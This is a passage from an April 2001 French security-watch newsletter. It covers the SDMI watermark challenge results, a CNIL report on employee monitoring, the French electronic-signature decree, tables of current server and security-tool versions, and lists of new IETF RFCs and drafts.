Afin de valider la solidité des concepts et principes ainsi établis pour le premier palier technique, dit phase 1, un défi<br />
public a été lancé en Septembre 2000 pour une durée de 3 semaines. Ce palier utilise deux mécanismes, l'un<br />
permettant de prouver la non-manipulation du contenu au moyen d'une signature cryptographique de celui-ci, le<br />
second visant à fournir un moyen de marquage non altérable du contenu utilisant la technique dite du<br />
'watermarking'. Un contenu non marqué et ne comportant pas de signature est considéré comme acceptable car<br />
antérieur à la mise en place du système; il faut bien assurer la compatibilité avec les contenus existants !<br />
Le défi portait sur ce dernier mécanisme et avait pour objectif d'éliminer le marquage effectué au moyen de 6<br />
algorithmes distincts sur des contenus imposés sans que cette manipulation ne soit détectable. A cette fin, trois<br />
fichiers ont été fournis pour chaque algorithme:<br />
- un fichier non marqué contenant une chanson<br />
- le même fichier mais marqué<br />
- un fichier marqué contenant une autre chanson<br />
La bonne éradication du marquage de ce dernier fichier pouvait être contrôlée par chaque participant par le biais d'un<br />
ORACLE mis à disposition et accessible par courrier électronique. L'utilisation d'un ORACLE (réponse binaire<br />
OUI/NON) permet d'éviter de divulguer l'algorithme utilisé tout en garantissant le bon déroulement des tests.<br />
Bien que les participants se soient engagés à ne pas divulguer les techniques employées pour contourner la protection<br />
offerte par le marquage, les rapports techniques détaillés concernant les attaques menées par deux groupes ont été<br />
rendus disponibles sur l'Internet depuis le début de l'année:<br />
- Groupe Français: Julien Bœuf et Julien P Stern via le site de JP.Stern<br />
- Groupe Américain: Université de Princeton via 'Cryptome'<br />
Ces rapports seraient passés inaperçus du public si une tentative d'interdiction de la publication du rapport du groupe<br />
de l'université de Princeton à l'occasion de la conférence International Information Hiding Workshop devant se<br />
tenir en avril n'avait été dévoilée par le site 'Cryptome'.<br />
Ce document, démontre en effet, chiffres à l'appui, l'efficacité et l'ingéniosité des techniques d'analyses employées, en<br />
considérant que 2 des 6 défis ne pouvaient relevés avec le matériel fourni:<br />
<strong>Veille</strong> <strong>Technologique</strong> <strong>Sécurité</strong> N°33 Page 11/59<br />
© APOGEE Communications - Tous droits réservés Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Avril 2001<br />
1. Algorithme A Watermark Marque non éliminée (Nécessite une attaque en force et un délai plus important)<br />
2. Algorithme B Watermark Marque éliminée<br />
3. Algorithme C Watermark Marque éliminée<br />
4. Algorithme D Signature Vérification impossible (Oracle biaisé rejettant systématiquement les tests valides)<br />
5. Algorithme E Signature Défi biaisé (Exemples fournis insuffisants)<br />
6. Algorithme F Watermark Marque éliminée<br />
Attention, le document a été retiré du site original situé en Allemagne à la suite d'une injonction de la part de la<br />
société XEROX, du matériel intellectuel appartenant à cette société étant a priori présent dans le document. Notons<br />
que celui-ci est en effet co-signé par Drew Dean, chercheur au Xerox Computer Science Laboratory de Palo Alto.<br />
Complément d'information<br />
Http://cryptome.org/sdmi-attack.htm<br />
http://www.julienstern.org/sdmi/<br />
http://www.sdmi.org/<br />
LA LEGISLATION<br />
INFORMATIQUE ET LIBERTE<br />
LA CYBERSURVEILLANCE DES SALARIES DANS L'ENTREPRISE<br />
Description<br />
La CNIL (Commission Nationale de l'Informatique et des Libertés) publie un rapport d'étude intitulé 'la<br />
cybersurveillance des salariés dans l'entreprise'. Ce rapport illustre les différentes techniques permettant de contrôler<br />
les salariés en opposition au respect de la vie privée de chacun, tout en évoquant la loi et la jurisprudence françaises.<br />
Cette étude très attendue risque de faire acte au sein des entreprises et des syndicats représentatifs des salariés.<br />
Complément d’information<br />
http://www.cnil.fr/thematic/docs/entrep/cybersurveillance.pdf<br />
http://www.cnil.fr/thematic/surveillance.htm<br />
SIGNATURE ELECTRONIQUE<br />
PARUTION DU DECRET D'APPLICATION<br />
Description<br />
Le décret portant application de l'article 1316-4 du code civil relatif à la signature électronique est paru au journal<br />
officiel le 31 Mars 2001 sous la référence 2001-272.<br />
Articulé en 4 chapitres, ce décret précise notamment les caractéristiques, exigences de sécurité et conditions<br />
d'utilisation des dispositifs de création et de vérification des signatures et <strong>cert</strong>ificats:<br />
Chapitre I: Des dispositifs sécurisés de création de signature électronique<br />
Chapitre II: Des dispositifs de vérification de signature électronique<br />
Chapitre III: Des <strong>cert</strong>ificats électroniques qualifiés et des prestataires de services de <strong>cert</strong>ification électronique<br />
Chapitre IV: Dispositions diverses<br />
Notons que le site du 'Programme d'action gouvernemental pour la société de l'information' (Services du Premier<br />
Ministre) propose un excellent dossier en ligne sur la signature électronique abordant à la fois les points de vue<br />
techniques et législatifs:<br />
L'essentiel : la signature électronique en quelques mots et images (animation)<br />
Questions/réponses :<br />
la signature électronique<br />
la <strong>cert</strong>ification électronique<br />
la signature électronique... pour quels usages ?<br />
le décret<br />
l'utilisation de la signature électronique<br />
Dossier technique : définitions et mécanismes de la signature électronique<br />
Pour en savoir (encore) plus :<br />
- Communiqué de presse du Premier ministre du 3 avril 2001<br />
- Loi du 13 mars 2000<br />
Complément d’information<br />
http://www.legifrance.gouv.fr/citoyen/jorf_nor.ow?numjo=JUSC0120141D<br />
http://www.legifrance.gouv.fr/citoyen/jorf_nor.ow?numjo=JUSX9900020L<br />
http://www.internet.gouv.fr/francais/textesref/pagsi2/signelect/sommaire.htm<br />
<strong>Veille</strong> <strong>Technologique</strong> <strong>Sécurité</strong> N°33 Page 12/59<br />
© APOGEE Communications - Tous droits réservés Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Avril 2001<br />
LES SERVICES DE BASE<br />
LOGICIELS LIBRES<br />
Les dernières versions des services de base sont rappelées dans les tableaux suivants. Nous conseillons<br />
d’assurer rapidement la mise à jour de ces versions, après qualification préalable sur une plate-forme<br />
dédiée.<br />
RESEAU<br />
Nom Fonction Ver. Date Source<br />
BIND Gestion de Nom (DNS) 9.1.1 28/03/01 http://www.isc.org/products/BIND<br />
DHCP Serveur d'adresse 3.0rc2pl1 24/04/01 http://www.isc.org/products/DHCP/dhcp-v3.html<br />
NTP4 Serveur de temps 4.0.99k23 11/04/01 http://www.eecis.udel.edu/~ntp<br />
WU-FTP Serveur de fichiers 2.6.1 02/07/00 http://www.wu-ftpd.org<br />
NTP: la version 4.0.99k est vulnérable à une attaque portant sur un débordement de buffer.<br />
MESSAGERIE<br />
Nom Fonction Ver. Date Source<br />
IMAP4 Relevé courrier 2000c 20/02/01 http://www.washington.edu/imap/documentation/RELNOTES.html<br />
POP3 Relevé courrier 4.0 25/04/01 http://www.eudora.com/qpopper_general/<br />
SENDMAIL Serveur de courrier 8.12.0b7 04/04/01 http://www.sendmail.org<br />
WEB<br />
Nom Fonction Ver. Date Source<br />
APACHE Serveur WEB<br />
1.3.19 28/02/01 http://httpd.apache.org/dist<br />
2.0.16b 04/04/01<br />
ModSSL API SSL Apache 1.3.19 2.8.2 30/03/01 http://www.modssl.org/<br />
MySQL Base SQL 3.23.37 20/04/01 http://www.mysql.com/downloads/index.html<br />
SQUID Cache WEB 2.4s1 20/03/01 http://www.squid-cache.org<br />
AUTRE<br />
Nom Fonction Ver. Date Source<br />
INN Gestion des news 2.3.1 11/01/01 http://www.isc.org/products/INN<br />
MAJORDOMO Gestion des listes 1.94.5 15/01/00 http://www.greatcircle.com/majordomo<br />
OpenCA Gestion de <strong>cert</strong>ificats 0.2.0-5 26/01/01 http://www.openca.org<br />
OpenLDAP Gestion de l'annuaire 2.0.7 06/11/00 http://www.openldap.org<br />
LES OUTILS<br />
Une liste, non exhaustive, des produits et logiciels de sécurité du domaine public est proposée dans les<br />
tableaux suivants.<br />
LANGAGES<br />
Nom Fonction Ver. Date Source<br />
Perl Scripting 5.6.1 23/04/00 http://www.cpan.org/src/index.html<br />
PHP WEB Dynamique 4.0.4pl1 11/01/01 http://www.php.net<br />
ANALYSE RESEAU<br />
Nom Fonction Ver. Date Source<br />
Big Brother Visualisateur snmp 1.7.b4 11/04/01 http://maclawran.ca/bb-dnld/new-dnld.html<br />
Dsniff Boite à outils 2.3 17/12/00 http://www.monkey.org/~dugsong/dsniff<br />
EtherEal Analyse multiprotocole 0.8.17 12/04/01 http://www.ethereal.com<br />
IP Traf Statistiques IP 2.4.0 20/03/01 http://cebu.mozcom.com/riker/iptraf/<br />
Nstreams Générateur de règles 1.0.0 11/11/00 http://www.hsc.fr/ressources/outils/nstreams/download/<br />
SamSpade Boite à outils 1.14 10/12/99 http://www.samspade.org/ssw/<br />
TcpDump Analyse multiprotocole 3.6.2 05/02/01 http://www.tcpdump.org/<br />
ANALYSE DE JOURNAUX<br />
Nom Fonction Ver. Date Source<br />
Analog Journaux serveur http 4.16 13/02/01 http://www.analog.cx<br />
Autobuse Analyse syslog 1.13 31/01/00 http://www.picante.com/~gtaylor/autobuse<br />
<strong>Veille</strong> <strong>Technologique</strong> <strong>Sécurité</strong> N°33 Page 13/59<br />
© APOGEE Communications - Tous droits réservés Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Avril 2001<br />
SnortSnarf Analyse Snort 041501 15/04/01 http://www.silicondefense.com/software/snortsnarf/<br />
WebAlizer Journaux serveur http 2.01-06 17/10/00 http://www.mrunix.net/webalizer/<br />
ANALYSE DE SECURITE<br />
Nom Fonction Ver. Date Source<br />
curl Analyse http et https 7.7.2 23/04/01 http://curl.haxx.se/<br />
Nessus Vulnérabilité réseau 1.0.7a 30/01/00 http://www.nessus.org<br />
Nmap Vulnérabilité réseau 2.53 05/09/00 http://www.insecure.org/nmap<br />
2.54B22 10/03/01<br />
Pandora Vulnérabilité Netware 4.0b2.1 12/02/99 http://www.packetfactory.net/projects/pandora/<br />
Saint Vulnérabilité réseau 3.2.1 12/04/01 http://www.wwdsi.com/saint<br />
Sara Vulnérabilité réseau 3.3.5 25/03/01 http://www-arc.com/sara<br />
Tara (tiger) Vulnérabilité système 2.0.9 07/09/99 http://www-arc.com/tara<br />
Tiger Vulnérabilité système 2.2.4p1 19/07/99 ftp://net.tamu.edu/pub/security/TAMU/tiger<br />
Trinux Boite à outils 0.8pre1 22/10/00 http://www.io.com/~mdfranz/trinux/boot-images/<br />
CONFIDENTIALITE<br />
Nom Fonction Ver. Date Source<br />
OpenPGP Signature/Chiffrement http://www.openpgp.org/<br />
GPG Signature/Chiffrement 1.0.4p1 30/11/00 http://www.gnupg.org<br />
CONTROLE D'ACCES<br />
Nom Fonction Ver. Date Source<br />
TCP Wrapper Accès services TCP 7.6 ftp://ftp.<strong>cert</strong>.org/pub/tools/tcp_wrappers<br />
Xinetd Inetd amélioré 2.1.89p14 18/01/01 http://www.xinetd.org<br />
CONTROLE D'INTEGRITE<br />
Nom Fonction Ver. Date Source<br />
Tripwire Intégrité LINUX 2.3.47 15/08/00 http://www.tripwire.org/downloads/index.php<br />
DETECTION D'INTRUSION<br />
Nom Fonction Ver. Date Source<br />
Deception TK Pot de miel 19990818 18/08/99 http://all.net/dtk/dtk.html<br />
Snort IDS Système 1.7 05/01/01 http://www.snort.org<br />
Shadow IDS Réseau 1.6 01/07/00 http://www.nswc.navy.mil/ISSEC/CID/<br />
GENERATEURS DE TEST<br />
Nom Fonction Ver. Date Source<br />
FireWalk Analyse filtres 1.0 03/02/01 http://www.packetfactory.net/firewalk<br />
FragRouter Fragments IP 1.6 21/09/97 http://www.anzen.com/research/nidsbench/<br />
IPSend Paquets IP 2.1a 19/09/97 ftp://coombs.anu.edu.au/pub/net/misc<br />
IDSWakeUp Détection d'intrusion 1.0 13/10/00 http://www.hsc.fr/ressources/outils/idswakeup/download/<br />
TcpReplay Sessions TCP 1.0.1 19/05/97 http://www.anzen.com/research/nidsbench/<br />
UdpProbe Paquets UDP 1.2 13/02/96 http://sites.inka.de/sites/bigred/sw/udpprobe.txt<br />
PARE-FEUX<br />
Nom Fonction Ver. Date Source<br />
DrawBridge PareFeu FreeBsd 3.1 19/04/00 http://drawbridge.tamu.edu<br />
IpFilter Filtre datagramme 3.4.17 07/04/01 http://coombs.anu.edu.au/ipfilter/ip-filter.html<br />
Cooker PareFeu Linux Experim. 26/02/01 http://www.linux-mandrake.com/fr/cookerdevel.php3<br />
Sinus PareFeu Linux 0.1.6 01/09/00 http://www.ifi.unizh.ch/ikm/SINUS/firewall<br />
TUNNELS<br />
Nom Fonction Ver. Date Source<br />
CIPE Pile Crypto IP (CIPE) 1.5.1 11/02/01 http://sites.inka.de/sites/bigred/devel/cipe.html<br />
FreeSwan Pile IPSec 1.9 27/03/01 http://www.freeswan.org<br />
http-tunnel Encapsulation http 3.0.5 06/12/00 http://www.nocrew.org/software/httptunnel.html<br />
3.3 (dev) 08/03/01<br />
OpenSSL Pile SSL 0.9.6a 05/04/01 http://www.openssl.org/<br />
OpenSSH Pile SSH 1 et 2 2.5.2 19/03/01 http://www.openssh.com/<br />
SSF Pile SSH 1 autorisée 1.2.27.6 16/09/99 http://info.in2p3.fr/secur/ssf<br />
Stunnel Proxy https 3.14 22/02/01 http://www.stunnel.org<br />
Zebedee Tunnel TCP/UDP 2.2.1 09/02/01 http://www.winton.org.uk/zebedee/<br />
<strong>Veille</strong> <strong>Technologique</strong> <strong>Sécurité</strong> N°33 Page 14/59<br />
© APOGEE Communications - Tous droits réservés Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Avril 2001<br />
NORMES ET STANDARDS<br />
LES PUBLICATIONS DE L'IETF<br />
LES RFC<br />
Du 23/03/2001 au 20/04/2001, 14 RFC ont été publiés dont 2 RFC ayant trait à la sécurité<br />
et …. trois poissons d'Avril !!!<br />
RFC TRAITANT DE LA SECURITE<br />
Thème Num Date Etat Titre<br />
MPPE 3078 03/01 Inf Microsoft Point-To-Point Encryption (MPPE) Protocol<br />
3079 03/01 Inf Deriving Keys for use with Microsoft Point-to-Point Encryption (MPPE)<br />
HOAX 3093 04/01 Inf Firewall Enhancement Protocol (FEP)<br />
RFC TRAITANT DE DOMAINES CONNEXES A LA SECURITE<br />
Thème Num Date Etat Titre<br />
LDAP 3088 04/01 Exp OpenLDAP Root Service An experimental LDAP referral service<br />
ECML 3106 04/01 Inf ECML v1.1: Field Specifications for E-Commerce<br />
AUTRES RFC<br />
Thème Num Date Etat Titre<br />
IP 3115 04/01 Pst Mobile IP Vendor/Organization-Specific Extensions<br />
MISC 3086 04/01 Inf Definition of Differentiated Services Per Domain Behaviors and Rules for their Specification<br />
3098 04/01 Inf How to Advertise Responsibly Using E-Mail & News - how NOT to $$$$ MAKE ENEMIES FAST! $$$$<br />
SIP 3087 04/01 Inf Control of Service Context using SIP Request-URI<br />
TLI 3094 04/01 Inf Transport Adapter Layer Interface<br />
XML 3075 03/01 Pst XML-Signature Syntax and Processing<br />
3076 03/01 Inf Canonical XML Version 1.0<br />
HOAX 3091 04/01 Inf Pi Digit Protocol<br />
HOAX 3092 04/01 Inf Etymology of "FOO"<br />
LES DRAFTS<br />
Du 23/03/2001au 20/04/2001, 260 drafts ont été publiés: 175 drafts mis à jour, 85<br />
nouveaux drafts, dont 13 drafts ayant directement trait à la sécurité.<br />
NOUVEAUX DRAFTS TRAITANT DE LA SECURITE<br />
Thème Nom du Draft Date Titre<br />
DNS draft-ietf-dnsext-parent-sig-00 30/03 Parent's SIG over child's KEY<br />
draft-ietf-dnsext-parent-stores-zone-keys-00 30/03 Parent stores the child's zone KEYs<br />
MOBILEIP draft-mkhalil-mobileip-ipv6-sap-00 30/03 Dynamic Security Association Establishment Protcol For IPv6<br />
draft-perkins-bake-00 11/04 Binding Authentication Key Establishment Protocol for Mobile IPv6<br />
NAT draft-davies-fw-nat-traversal-00 02/04 Traversal of non-Protocol Aware Firewalls & NATS<br />
OTP draft-nesser-otp-sha-256-384-512-00 02/04 AES Companion Hash Def. (SHA256, SHA384, SHA512) for OTP<br />
PKIX draft-ietf-msec-gsakmp-sec-00 22/03 Group Secure Association Key Management Protocol<br />
draft-ietf-pkix-rfc2797-bis-00 13/04 Certificate Management Messages over CMS<br />
PROTECT draft-lloyd-protectedattrs-00 22/03 A Framework for Cryptographically Protected Attribute Values<br />
SASL draft-myers-saslrev-00 29/03 Simple Authentication and Security Layer (SASL)<br />
SMTP draft-bose-smtp-integrity-00 04/04 Checking of Message Integrity During SMTP Transactions<br />
SSH draft-friedl-secsh-fingerprint-00 30/03 SSH Fingerprint Format<br />
SUCV draft-montenegro-sucv-00 11/04 Statistically Unique & Cryptographically verifiable Identif.. & Addr.<br />
MISE A JOUR DE DRAFTS TRAITANT DE LA SECURITE<br />
Thème Nom du Draft Date Titre<br />
CAT draft-ietf-cat-sasl-gssapi-03 02/04 SASL GSSAPI mechanisms<br />
COPS draft-gross-cops-sip-01 13/04 COPS Usage for SIP<br />
<strong>Veille</strong> <strong>Technologique</strong> <strong>Sécurité</strong> N°33 Page 15/59<br />
© APOGEE Communications - Tous droits réservés Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Avril 2001<br />
DNS draft-ietf-dnsext-rsa-03 12/04 RSA/SHA-1 SIGs and RSA KEYs in the Domain Name System<br />
draft-lewis-state-of-dnssec-01 23/03 Notes from the State-Of-The-Technology: DNSSEC<br />
EDI draft-ietf-ediint-as1-12 09/04 MIME-based Secure EDI<br />
draft-ietf-ediint-as2-08 05/04 HTTP Transport for Secure EDI<br />
IDS draft-ietf-idwg-iap-05 11/04 IAP: Intrusion Alert Protocol<br />
IETF draft-rescorla-sec-cons-03 30/03 Guidelines for Writing RFC Text on Security Considerations<br />
IKE draft-beaulieu-ike-xauth-01 02/04 Extended Authentication within IKE (XAUTH)<br />
draft-dukes-ike-mode-cfg-01 02/04 The ISAKMP Configuration Method<br />
IPSEC draft-ietf-ipsec-ike-auth-ecdsa-02 30/03 IKE Authentication Using ECDSA<br />
draft-ietf-ipsec-ike-ecc-groups-03 30/03 Additional ECC Groups For IKE<br />
draft-ietf-ipsec-openpgp-01 23/03 OpenPGP Key Usage in IKE<br />
MOBILEIP draft-haverinen-mobileip-gsmsim-02 11/04 GSM SIM Authentication and Key Generation for Mobile IP<br />
draft-skibbie-krb-kdc-ldap-schema-01 30/03 Kerberos KDC LDAP Schema<br />
PGP draft-ietf-openpgp-mime-06 10/04 MIME Security with OpenPGP<br />
PKIX draft-ietf-pkix-new-part1-06 09/04 Internet X.509 PKI Certificate and CRL Profile<br />
draft-ietf-pkix-pi-02 02/04 Internet X.509 Public Key Infrastructure Permanent Identifier<br />
draft-ietf-pkix-time-stamp-14 06/04 Internet X.509 PKI Time Stamp Protocols (TSP)<br />
draft-orman-public-key-lengths-02 22/03 Determining strengths for PK used for exchanging symmetric keys<br />
PPP draft-haverinen-pppext-eap-sim-01 11/04 EAP SIM Authentication (Version 1)<br />
SACRED draft-ietf-sacred-reqs-02 30/03 Securely Available Credentials - Requirements<br />
SHA draft-eastlake-sha1-01 11/04 US Secure Hash Algorithm 1 (SHA1)<br />
SIP draft-gross-sipaq-01 13/04 QoS and AAA Usage with SIP Based IP Communications<br />
SMIME draft-ietf-smime-aes-alg-01 23/03 Use of the Advanced Encryption Algorithm in CMS<br />
draft-ietf-smime-esformats-04 09/04 Electronic Signature Formats for long term electronic signatures<br />
draft-ietf-smime-espolicies-01 09/04 Electronic Signature Policies<br />
SSH draft-nisse-secsh-srp-01 30/03 Using the SRP protocol as a key exchange method in Secure Shell<br />
SSL draft-murray-auth-ftp-ssl-07 09/04 Securing FTP with TLS<br />
TLS draft-ietf-tls-ecc-01 30/03 ECC Cipher Suites For TLS<br />
draft-ietf-tls-openpgp-01 23/03 Extensions to TLS for OpenPGP keys<br />
TRACK draft-ietf-rmt-pi-track-security-01 06/04 Security Requirements For TRACK<br />
DRAFTS TRAITANT DE DOMAINES CONNEXES A LA SECURITE<br />
Thème Nom du Draft Date Titre<br />
BEEP draft-mrose-beep-design-03 30/03 On the Design of Application Protocols<br />
BGP draft-berkowitz-bgpcon-01 09/04 Benchmarking Methodology for Exterior Routing Convergence<br />
DIAMETER draft-ietf-aaa-diameter-02 09/04 Diameter Base Protocol<br />
draft-ietf-aaa-diameter-api-00 11/04 The DIAMETER API<br />
draft-ietf-aaa-diameter-mobileip-02 09/04 Diameter Mobile IP Extensions<br />
draft-ietf-aaa-diameter-nasreq-02 09/04 Diameter NASREQ Extensions<br />
DNS draft-ietf-dnsop-hardie-shared-root-server-04 22/03 Distributing Root / Authoritative NS via shared unicast addresses<br />
draft-slone-dn2fqdn-00 11/04 Converting LDAP/X.500 DN to DNS to support server location<br />
ECML draft-ietf-trade-ecml2-req-01 02/04 Electronic Commerce Modeling Language: Version 2 Requirements<br />
IPS draft-ietf-ips-iscsi-reqmts-03 20/04 iSCSI Requirements and Design Considerations<br />
LDAP draft-greenblatt-ldapext-style-01 02/04 LDAP Extension Style Guide<br />
draft-greenblatt-ldap-perms-00 03/04 Application Defined Permissions for LDAP<br />
draft-ietf-ldapbis-iana-01 12/04 IANA Considerations for LDAP<br />
draft-ietf-ldapbis-user-schema-00 06/04 A Summary of the X.500 User Schema for use with LDAPv3<br />
draft-rharrison-ldap-framing-profile-00 22/03 Profile for Framing LDAPv3 Operations<br />
draft-rharrison-ldap-intermediate-resp-00 02/04 LDAP Intermediate Response<br />
draft-weltman-ldap-java-controls-06 29/03 Java LDAP Controls<br />
draft-zeilenga-ldap-cancel-03 02/04 LDAP Cancel Extended Operation<br />
draft-zeilenga-ldap-dnsref-00 02/04 Use of DNS SRV in LDAP Named Subordinate References<br />
draft-zeilenga-ldap-features-00 04/04 Feature Discovery in LDAP<br />
draft-zeilenga-ldap-grouping-02 02/04 LDAPv3: Grouping of Related Operations<br />
draft-zeilenga-ldap-idn-01 03/04 International Domain Names and LDAP<br />
draft-zeilenga-ldap-opattrs-00 04/04 LDAPv3: All Operational Attributes<br />
draft-zeilenga-ldap-txn-02 03/04 LDAPv3 Transactions<br />
draft-zeilenga-ldapv3bis-opattrs-06 02/04 LDAPv3: All Operational Attributes<br />
LDUP draft-ietf-ldup-replica-req-08 29/03 LDAPv3 Replication Requirements<br />
draft-ietf-ldup-subentry-08 06/04 LDAP Subentry Schema<br />
MPLS draft-shah-mpls-l2vpn-ext-00 22/03 Extensions to MPLS-based Layer 2 VPNs<br />
NAT draft-ietf-nat-app-guide-05 22/03 NAT Friendly Application Design Guidelines<br />
draft-ietf-nat-interface-framework-03 10/04 Framework for interfacing with Network Address Translator<br />
NGTRANS draft-ietf-ngtrans-isatap-00 23/03 Intra-Site Automatic Tunnel Addressing Protocol (ISATAP)<br />
PILC draft-ietf-pilc-pep-06 05/04 Perf. Enhancing Proxies That Improve Link-Related Degradations<br />
POLICY draft-ietf-policy-core-schema-10 02/04 Policy Framework LDAP Core Schema<br />
draft-ietf-policy-pcim-ext-01 09/04 Policy Core Information Model Extensions<br />
PPP draft-shimizu-ppp-mapos-01 02/04 MAPOS/PPP Tunneling mode<br />
SPPI draft-ietf-rap-sppi-06 13/04 Structure of Policy Provisioning Information (SPPI)<br />
SYSLOG draft-ietf-syslog-reliable-05 30/03 Reliable Delivery for Syslog<br />
draft-ietf-syslog-syslog-07 30/03 Syslog Protocol<br />
AUTRES DRAFTS<br />
<strong>Veille</strong> <strong>Technologique</strong> <strong>Sécurité</strong> N°33 Page 16/59<br />
© APOGEE Communications - Tous droits réservés Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Avril 2001<br />
Thème Nom du Draft Date Titre<br />
3GPP draft-3gpp-collaboration-01 12/04 3GPP-IETF Standardization Collaboration<br />
draft-jonsson-3gpp2-rohc-rtp-0-byte-requirements-00 30/03 3GPP2 Requirements for 0-byte ROHC IP/UDP/RTP Header comp.<br />
AAP draft-ietf-malloc-aap-04 11/04 Multicast Address Allocation Protocol (AAP)<br />
ADSL draft-ietf-adslmib-adslext-07 12/04 Definitions of Extention Managed Objects for ADSL Lines<br />
draft-ietf-adslmib-hdsl2-09 03/04 Definitions of Managed Objects for HDSL2 and SHDSL Lines<br />
AFPHB draft-bianchi-blefari-admcontr-over-af-phb-00 22/03 Per Flow Admission Control over AF PHB Classes<br />
APEX draft-ietf-apex-access-00 09/04 The APEX Access Service<br />
draft-ietf-apex-core-00 09/04 The Application Exchange Core<br />
draft-ietf-apex-presence-00 09/04 The APEX Presence Service<br />
ARK draft-kunze-ark-01 02/04 The ARK Persistent Identifier Scheme<br />
ATOM draft-ietf-atommib-atm2-17 10/04 Definitions of Supplemental Managed Objects for ATM Interface<br />
draft-ietf-atommib-sonetaps-mib-04 03/04 Definitions of Managed Objects for SONET Linear APS Architect.<br />
AVT draft-ietf-avt-rtp-amr-06 02/04 RTP payload & file storage format for AMR & AMR-WB audio<br />
BINARY draft-netstrap-binary-encod-conver-00 04/04 METHOD OF ENCODING BINARY DATA (Version I)<br />
CAN draft-cafi-can-ip-00 22/03 IP over CAN<br />
CDNP draft-penno-cdnp-nacct-userid-03 04/04 User Profile Information Protocol<br />
COPS draft-boutaba-copsprmp-00 13/04 COPS-PR with Meta-Policy Support<br />
DHCP draft-ietf-dhc-pv4-reconfigure-04 10/04 DHCP reconfigure extension<br />
DIFFSER draft-ietf-diffserv-new-terms-04 29/03 New Terminology for Diffserv<br />
draft-ietf-diffserv-rfc2598bis-01 13/04 An Expedited Forwarding PHB<br />
DIR draft-alvestrand-directory-defs-02 10/04 Definitions for talking about directories<br />
DISMAN draft-ietf-disman-script-mib-v2-03 11/04 Definitions of Managed Objects for the Delegation of mgmt Scripts<br />
draft-ietf-disman-snmp-alarm-mib-01 02/04 SNMP Alarms and MIB Module<br />
E2E draft-ohta-e2e-multihoming-01 05/04 The Architecture of End to End Multihoming<br />
ECN draft-ietf-tsvwg-ecn-03 29/03 The Addition of Explicit Congestion Notification (ECN) to IP<br />
EDI draft-ietf-ediint-req-09 09/04 Requirements for Inter-operable Internet EDI<br />
ENUM draft-pfautz-yu-enum-adm-01 30/03 ENUM Administrative Process in the U.S.A.<br />
draft-rutkowski-enum-basis-00 30/03 Development and Basis of International Telephone Numbering<br />
EPP draft-hollenbeck-epp-contact-01 09/04 Extensible Provisioning Protocol Contact Mapping<br />
draft-hollenbeck-epp-domain-01 09/04 Extensible Provisioning Protocol Domain Name Mapping<br />
draft-hollenbeck-epp-host-01 09/04 Extensible Provisioning Protocol Host Mapping<br />
draft-hollenbeck-epp-tcp-01 09/04 Extensible Provisioning Protocol Transport Over TCP<br />
draft-ietf-provreg-epp-01 09/04 Extensible Provisioning Protocol<br />
EXT draft-eastlake-ext-ip-ver-01 02/04 Extended IP Versions<br />
FAST draft-gan-fast-reroute-00 11/04 A Method for MPLS LSP Fast-Reroute Using RSVP Detours<br />
FAX draft-ietf-fax-faxaddr-v2-03 23/03 Minimal FAX address format in Internet Mail<br />
draft-ietf-fax-implementers-guide-07 04/04 Implementers Guide for Facsimile Using Internet Mail<br />
draft-ietf-fax-minaddr-v2-03 23/03 Minimal GSTN address format in Internet Mail<br />
FCIP draft-ietf-ips-fcovertcpip-02 20/04 Fibre Channel Over TCP/IP (FCIP)<br />
FIB draft-ietf-bmwg-fib-term-01 30/03 Terminology for FIB based Router Performance<br />
GNP draft-wildgrube-gnp-01 05/04 GENERAL NETWORK PROTOCOL (GNP)<br />
GRE draft-christian-gre-over-clnp-00 22/03 Generic Routing Encapsulation over CLNP networks<br />
GRRP draft-ietf-provreg-grrp-reqs-01 30/03 Generic Registry-Registrar Protocol Requirements<br />
H323 draft-levin-iptel-h323-url-scheme-03 05/04 H.323 URL scheme definition<br />
HANDLE draft-sun-handle-system-06 12/04 Handle System Overview<br />
draft-sun-handle-system-def-04 12/04 Handle System Namespace and Service Definition<br />
draft-sun-handle-system-protocol-01 12/04 Handle System Protocol (ver 2.0) Specification<br />
HTTP draft-cooper-wrec-known-prob-01 13/04 Known HTTP Proxy/Caching Problems<br />
draft-mogul-http-delta-08 30/03 Delta encoding in HTTP<br />
draft-mogul-http-ooo-00 09/04 Support for out-of-order responses in HTTP<br />
draft-wilson-wrec-wccp-v2-01 03/04 Web Cache Coordination Protocol V2.0<br />
HUITEMA draft-durand-huitema-high-density-ratio-01 22/03 The High Density ratio for address assignment efficiency ….<br />
IDN draft-ietf-idn-altdude-00 22/03 AltDUDE version 0.0.2<br />
draft-ietf-idn-amc-ace-o-00 22/03 AMC-ACE-O version 0.0.3<br />
draft-ietf-idn-amc-ace-r-00 29/03 AMC-ACE-R version 0.0.0<br />
draft-ietf-idn-cjk-01 10/04 Han Ideograph (CJK) for Internationalized Domain Names<br />
draft-ietf-idn-idne-02 22/03 Internationalized domain names using EDNS (IDNE)<br />
draft-ietf-idn-uname-00 02/04 Internationalized Domain Names and Unique Identifiers/Names<br />
IDR draft-ietf-idr-route-filter-03 02/04 Cooperative Route Filtering Capability for BGP-4<br />
draft-ietf-idr-route-oscillation-00 30/03 BGP Persistent Route Oscillation Condition<br />
IETF draft-hain-msword-template-04 06/04 Using Microsoft Word to create Internet Drafts and RFC's<br />
draft-ietf-uswg-tao-04 10/04 The Tao of IETF - A Novice's Guide to the Internet Engineering …<br />
IFCP draft-ietf-ips-ifcp-01 20/04 IFCP - A Protocol for Internet Fibre Channel Storage Networking<br />
IGMP draft-ietf-idmr-igmp-proxy-00 04/04 IGMP-based Multicast Forwarding ('IGMP Proxying')<br />
ILB draft-felton-universal-language-00 11/04 International Language Bridge For Implem… Language Free Svs<br />
IMAP draft-segmuller-imap-structure-00 12/04 IMAP Extension: Structure<br />
IMPP draft-ietf-impp-cpim-msgfmt-01 02/04 Common Presence and Instant Messaging Message Format<br />
draft-ietf-impp-datetime-00 03/04 Date and Time on the Internet: Timestamps<br />
IOTP draft-ietf-trade-iotp-v1.0-papi-05 05/04 Payment API for v1.0 Internet Open Trading Protocol (IOTP)<br />
IP<br />
draft-kashyap-ipoib-requirements-00 02/04 IP over InfiniBand (IPoIB)Overview, Issues and Requirements<br />
